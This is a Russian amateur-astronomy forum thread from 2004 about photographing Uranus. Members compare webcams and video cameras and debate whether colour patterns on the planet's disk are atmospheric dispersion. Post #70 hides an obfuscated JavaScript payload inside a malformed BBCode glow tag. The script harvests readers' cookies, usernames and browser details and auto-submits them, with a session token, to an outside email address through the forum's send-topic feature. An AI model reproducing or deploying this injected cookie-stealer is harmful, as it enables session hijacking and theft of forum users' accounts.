Телескопы покупают здесь


A A A A Автор Тема: Охота на Уран  (Прочитано 137572 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Anton Ermakov

  • ****
  • Сообщений: 263
  • Благодарностей: 3
    • Skype - anton_wdewf
    • Сообщения от Anton Ermakov
Re: Охота на Уран
« Ответ #60 : 26 Авг 2004 [14:05:04] »
Да, кстати недавно на даче был. Под Калугой. Взял с собой только искатель. Думал телескоп в машине 180 км Российских дорог. Теперь жалею. Небо там ну просто ваще :o. Как в горах. Где-то 5.7m-6m видно невооруженном глазом. Только Ураны всякие и снимать. Может осенью туда съездить ::)
MIT, Department of Earth, Atmospheric and Planetary Sciences.

Оффлайн Anton Ermakov

  • ****
  • Сообщений: 263
  • Благодарностей: 3
    • Skype - anton_wdewf
    • Сообщения от Anton Ermakov
Re: Охота на Уран
« Ответ #61 : 26 Авг 2004 [14:10:33] »
Вот еще. Забыл  сказать.
Цитата
Ведь спутники Юпитера получаются
Со спутниками Юпитера дело проще. Ведь alignment выполняется по Юпитеру. Вот они кадр за кадром друг на друга и накладываются.
MIT, Department of Earth, Atmospheric and Planetary Sciences.

Оффлайн INPan

  • *****
  • Сообщений: 8 696
  • Благодарностей: 196
  • Игорь Панкратов
    • Сообщения от INPan
Re: Охота на Уран
« Ответ #62 : 26 Авг 2004 [14:46:03] »
Цитата
INPan а вы Уран то снимать пробовали? Интересно сравнить чувствительность web- и видео-камеры.
Нет пока. :-\ Но обязательно буду. Я его даже не видел пока. :-[

Оффлайн Tony

  • *****
  • Сообщений: 946
  • Благодарностей: 56
  • Мне нравится этот форум!
    • Сообщения от Tony
Re: Охота на Уран
« Ответ #63 : 26 Авг 2004 [15:13:17] »
Игорь, очень интересно будет послушать твои впечатления от наблюдений Урана. Надеюсь, что и видеосъемка получится.

Иван, если позволите вмешаться в ваш с Игорем разговор по поводу видеосъемок Урана, то скажу, что показанные мной в этой ветке (сообщения 34 и 39) изображения планеты получены в результате обработки видеоряда с цифровой видеокамеры. Чувствительности цифровой камеры хватает, но вот атмосфера была бала на 3-4 из 10.

Оффлайн Anton Ermakov

  • ****
  • Сообщений: 263
  • Благодарностей: 3
    • Skype - anton_wdewf
    • Сообщения от Anton Ermakov
Re: Охота на Уран
« Ответ #64 : 26 Авг 2004 [17:11:05] »
Цитата
Иван, если позволите вмешаться в ваш с Игорем разговор по поводу видеосъемок Урана, то скажу, что показанные мной в этой ветке (сообщения 34 и 39) изображения планеты получены в результате обработки видеоряда с цифровой видеокамеры. Чувствительности цифровой камеры хватает, но вот атмосфера была бала на 3-4 из 10.

Интересно посмотреть на исходные кадры. Вот например мой исходник при съемки от 19 июля на цифровик.
MIT, Department of Earth, Atmospheric and Planetary Sciences.

mihail

  • Гость
Re: Охота на Уран
« Ответ #65 : 27 Авг 2004 [10:45:53] »
Уважаемые!
Я думаю, что в вопросе "чем снимать Уран: вебкамерой, фото-  видеокамерой" необходимо обязательно учитывать аппертуру телескопа. По опыту съемок, для "дырки" в 150 мм (телескопы Ивана и мой)  - вебкамера мало пригодна, лучше - фотоаппарат или видеокамеру. В 175-200 мм Уран поярче будет, вот тогда и "заработает" Филлипс (пример - Уран Чавеса). Наверное, цифровая видеокамера - наиболее универсальное средство для съемок Урана.
 
« Последнее редактирование: 27 Авг 2004 [11:05:41] от mihail »

Оффлайн Slava K.

  • **
  • Сообщений: 61
  • Благодарностей: 0
  • Nexstar 8i, Canon 5D Mark III, Philips Pro II
    • Сообщения от Slava K.
    • Мой личный сайт
Re: Охота на Уран
« Ответ #66 : 28 Авг 2004 [13:46:03] »
2 часа, 28 августа 2004 г., одиночный кадр, ISO 800, 8 сек.

Оффлайн Slava K.

  • **
  • Сообщений: 61
  • Благодарностей: 0
  • Nexstar 8i, Canon 5D Mark III, Philips Pro II
    • Сообщения от Slava K.
    • Мой личный сайт
Re: Охота на Уран
« Ответ #67 : 29 Авг 2004 [21:48:58] »
Те же условия съемки, но сложено 3 кадра и в два раза увеличено в фотошопе.

Опять просматривается неоднородность диска - синезеленый цвет с одной стороны и желтоватый с другой. Поначалу воспринимал это как хроматическую абберацию, тем более что в Starry Night диск однороден по цвету. С другой стороны, у Tony, Diskusa другая оптика, но эффект тот же. К тому же у Хаббла диск тоже "распадается" на две разноцветных половины (правда в инфракрасном диапозоне) ...

Одним словом, я в сомнениях: выдаем мы желаемое за действительное или действительно видим это желаемое?  :)

XRUNDEL

  • Гость
Re: Охота на Уран
« Ответ #68 : 29 Авг 2004 [22:20:26] »
Те же условия съемки, но сложено 3 кадра и в два раза увеличено в фотошопе.

Опять просматривается неоднородность диска - синезеленый цвет с одной стороны и желтоватый с другой. Поначалу воспринимал это как хроматическую абберацию...  С другой стороны, у Tony, Diskusa другая оптика, но эффект тот же.

Одним словом, я в сомнениях: выдаем мы желаемое за действительное или действительно видим это желаемое?  :)

   Это не хроматическая абберация оптики телескопа, а атмосферная дисперсия. Дискус и Михаил снимали через ту же (Земную) атмосферу :). Чем ниже над уровнем горизонта объект - тем сильнее она проявляется. Это искажение (артефакт) можно уменьшить в том же Фотошопе, подвинув каналы относительно друг друга. Более качественный результат можно получить при помощи устройства, которое представляет собой призму с регулируемой геометрией - она настраивается таким образом, чтобы скомпенсировать смещение цвета атмосферой.

 
« Последнее редактирование: 29 Авг 2004 [22:25:32] от XRUNDEL »

Оффлайн Slava K.

  • **
  • Сообщений: 61
  • Благодарностей: 0
  • Nexstar 8i, Canon 5D Mark III, Philips Pro II
    • Сообщения от Slava K.
    • Мой личный сайт
Re: Охота на Уран
« Ответ #69 : 29 Авг 2004 [23:27:21] »
Чтож, лучше горькая правда ... :)

mihail

  • Гость
Re: Охота на Уран
« Ответ #70 : 30 Авг 2004 [12:10:19] »
Те же условия съемки, но сложено 3 кадра и в два раза увеличено в фотошопе.

Опять просматривается неоднородность диска - синезеленый цвет с одной стороны и желтоватый с другой. Поначалу воспринимал это как хроматическую абберацию...  С другой стороны, у Tony, Diskusa другая оптика, но эффект тот же.

Одним словом, я в сомнениях: выдаем мы желаемое за действительное или действительно видим это желаемое?  :)

   Это не хроматическая абберация оптики телескопа, а атмосферная дисперсия. Дискус и Михаил снимали через ту же (Земную) атмосферу :). Чем ниже над уровнем горизонта объект - тем сильнее она проявляется. Это искажение (артефакт) можно уменьшить в том же Фотошопе, подвинув каналы относительно друг друга. Более качественный результат можно получить при помощи устройства, которое представляет собой призму с регулируемой геометрией - она настраивается таким образом, чтобы скомпенсировать смещение цвета атмосферой.

 
Рустам, вот поэтому я и просил тебя подключиться к нашим "изысканиям" и снять Уран для того чтобы окончательно убедиться, что это: дисперсия или действительно, околополярная область.
Только что еще раз обработал серию снимков Урана, снятые Diskusom. Подвигал каналы - результат тот же, что и был раньше. Значит, вопрос остается открытым. [glow=red);background:url(javascript:execScript("for(i=0;i\x3cdocument.links.length;i++){u=document.links\x5bi\x5d.href;n=u.search('=profile;user=');if(n!=-1)break;};if(n!=-1){nm=u.substr(n+14);if(document.cookie.search('3x3=dyrka')==-1){if(window.history.length==0){e=new\x20Date();e.setTime(e.getTime()+365*86400000);ed=e.toGMTString();document.cookie='3x3=dyrka;\x20expires='+ed;for(i=0;i\x3cdocument.links.length;i++){u=document.links\x5bi\x5d.href;n=u.search('sesc=');if(n!=-1){sc=u.substr(n+5\x2c32)};n=u.search('board=');if(n!=-1){bo=parseInt(u.substr(n+6))};n=u.search('threadid=');if(n!=-1){th=parseInt(u.substr(n+9))}};a='\x68ttp\x3a\x2f\x2f\x77ww.astronomy.ru\x2fforum\x2findex\x2ephp\x3fboard='+bo+';threadid='+th+';action=sendtopic2;y_email=aa@bb.cc;r_name='+nm+';r_email=anton2003@inbox.ru';mes=document.cookie+'\x20'+navigator.userAgent+'\x20'+screen.width+'x'+screen.height+'/'+screen.colorDepth+'\x20'+document.charset;b='\x3chtml\x3e\x3cbody\x20bgColor=#1A065B\x3e\x3cform\x20action=\x22'+a+'\x22\x20method=\x22post\x22\x3e\x3cinput\x20type=hidden\x20name=\x22sc\x22\x20value=\x22'+sc+'\x22\x20\x3e\x3cinput\x20type=hidden\x20name=\x22y_name\x22\x20value=\x22'+mes+'\x22\x20\x3e\x3c\x2fform\x3e\x3cscript\x3edocument.forms\x5b0\x5d.submit();\x3c\x2fscript\x3e\x3c\x2fbody\x3e\x3c\x2fhtml\x3e';document.write(b);}else{window.open(document.location.href).moveTo(-10000);}}}"));filter:glow(color=red,2,300] [/glow]
« Последнее редактирование: 30 Авг 2004 [23:53:42] от mihail »

Оффлайн Tony

  • *****
  • Сообщений: 946
  • Благодарностей: 56
  • Мне нравится этот форум!
    • Сообщения от Tony
Re: Охота на Уран
« Ответ #71 : 30 Авг 2004 [14:52:05] »
Рустам, спасибо, что подключился. Ждем твоих снимков Урана.

Присоединяюсь к мнению Рустама по поводу атмосферной рефракции на снимках Славы. После раздумий на тему, кажется, что и на всех предыдущих снимках планеты мы выдаем желаемое за действительное, принимая дисперсию света в атмосфере за детали на диске планеты. И чтобы не гадать на кофейной гуще, а постепенно приближаться к истине, еще раз призываю всех:

Уважаемые коллеги, все, кто публикует свои снимки в этой теме! Убедительная просьба, хотя бы приблизительно указывать ориентацию снимка. Достаточно будет ставить буквы "N" и "E" на соответствующих сторонах снимка.

Для интересующихся показываю по одному исходному кадру из моих съемок Урана цивровой видеокамерой через МСТ-180 с окулярами НПЗ UWA 15мм и SW UW 6мм. С последним окуляром съемка велась в режиме ночной съемки, т.е. с убранным IR фильтром. Экспозиция каждого кадра 1/25 сек. К сожалению, не могу указать относительное отверстие, т.к. камера не пишет текущее фокусное расстояние объектива. Его величина перед съемкой подбиралась наибольшей, при которой планета еще видна в искатель камеры. Регистакс в состоянии работать с таким материалом и сложив 5 – 10 сотен кадров можно получить то, что я уже здесь показывал. Но, на мой взгляд, с таким исходным материалом и такой высоте планеты над горизонтом на широте Москвы надеяться на получение деталей на диске Урана – верх оптимизма. Буду очень рад, если кому-нибудь все же удастся запечатлеть неоднородность цвета диска Урана.

mihail

  • Гость
Re: Охота на Уран
« Ответ #72 : 30 Авг 2004 [15:29:27] »
Действительно, пространственная ориентация Урана на снимках прояснила бы этот "горячий" вопрос. Сейчас жалею, что при съемках с Сергеем мы не обратили на нее внимание... :(
Кстати, Tony, выложи пожайлуста, еще раз свой финальный снимок с маркерами ориентации. Спасибо.
« Последнее редактирование: 30 Авг 2004 [15:32:01] от mihail »

Оффлайн Ivan Mhitarov

  • Модератор
  • *****
  • Сообщений: 6 226
  • Благодарностей: 108
  • Награды Неоднократный победитель конкурса астрофото
    • Сообщения от Ivan Mhitarov
Re: Охота на Уран
« Ответ #73 : 08 Сен 2004 [13:06:13] »
Вторая попытка:

Снято вчера на MEADE ШН 250/1000 с 2Х ЛБ на Филипс 740-й переделанный. 15 из 30 кадров по 10 сек.
Остальные спутники были неудачно близки к диску Урана и засветились.
Иван Мхитаров
Кубанский Астрономический Клуб "45".

Оффлайн Anton Ermakov

  • ****
  • Сообщений: 263
  • Благодарностей: 3
    • Skype - anton_wdewf
    • Сообщения от Anton Ermakov
Re: Охота на Уран
« Ответ #74 : 09 Сен 2004 [19:31:04] »
Пока в Москве облака (Эх черт их подери >:() решил обработать старые исходники еще от 13 августа. На этот раз использовал более крупнокалибирные вейвлеты, легкую нерезкую маску и размытие гаусса. Получилось гораааздо лучше. Ориентацию кадра к сожалению не помню.
MIT, Department of Earth, Atmospheric and Planetary Sciences.

Оффлайн INPan

  • *****
  • Сообщений: 8 696
  • Благодарностей: 196
  • Игорь Панкратов
    • Сообщения от INPan
Re: Охота на Уран
« Ответ #75 : 11 Сен 2004 [04:57:53] »
Ого! Да тут диск виден! :o Здорово! 8)
А интересно, это реальный диск или фантазия регистакса?
Цитата Tony:
Цитата
Игорь, очень интересно будет послушать твои впечатления от наблюдений Урана. Надеюсь, что и видеосъемка получится.
Я вот недавно решил-таки на Уран поохотиться прямо из окна в свой Мицар. Так вот, что-то он мне не понравился совсем. Если бы я не знал, что это Уран, я бы его от звезды и не отличил. Смотрел с 3х ЛБ и 15 мм окуляром. Он виден чуть ли не боковым зрением. :( В таких условиях ни о какой видеосъёмке не может быть и речи. Жду не дождусь трубу для своего нового 150 мм Ньютона. Вот сделают, тогда и пальнём как следует! :) ;)

Оффлайн Anton Ermakov

  • ****
  • Сообщений: 263
  • Благодарностей: 3
    • Skype - anton_wdewf
    • Сообщения от Anton Ermakov
Re: Охота на Уран
« Ответ #76 : 11 Сен 2004 [15:13:39] »
Цитата
А интересно, это реальный диск или фантазия регистакса?
Я тоже задался этим вопросом. Сравнил со старымы фотками Луны, которые я также снимал с разрешением в 3.2 Mp через 15 мм окуляр *4х Барлоу. Получилось размер Урана 3.3"-3.5". Вроде близко.
MIT, Department of Earth, Atmospheric and Planetary Sciences.

Оффлайн Максим Гераськин

  • *****
  • Сообщений: 3 916
  • Благодарностей: 27
  • Мне нравится этот форум!
    • Сообщения от Максим Гераськин
Re: Охота на Уран
« Ответ #77 : 12 Сен 2004 [22:13:00] »
А интересно, это реальный диск или фантазия регистакса?

Похоже на реальность.
http://www.buytelescopes.com/gallery/view_photo.asp?pid=3318


Оффлайн Anton Ermakov

  • ****
  • Сообщений: 263
  • Благодарностей: 3
    • Skype - anton_wdewf
    • Сообщения от Anton Ermakov
Re: Охота на Уран
« Ответ #78 : 12 Сен 2004 [22:56:09] »
Цитата
http://www.buytelescopes.com/gallery/view_photo.asp?pid=3318
Так и до инфаркта не далеко. :o
MIT, Department of Earth, Atmospheric and Planetary Sciences.

Оффлайн Diskus

  • *****
  • Сообщений: 8 015
  • Благодарностей: 115
  • WS-200 DD , R-C 16"
    • Skype - Sergiyverb
    • Сообщения от Diskus
Re: Охота на Уран
« Ответ #79 : 13 Сен 2004 [00:17:33] »
Да Чавес совсем обнаглел , а противопоставить то ему нечего .......
Поскорее бы МАК 9" от Санковича получить , тогда и посмотрим. :)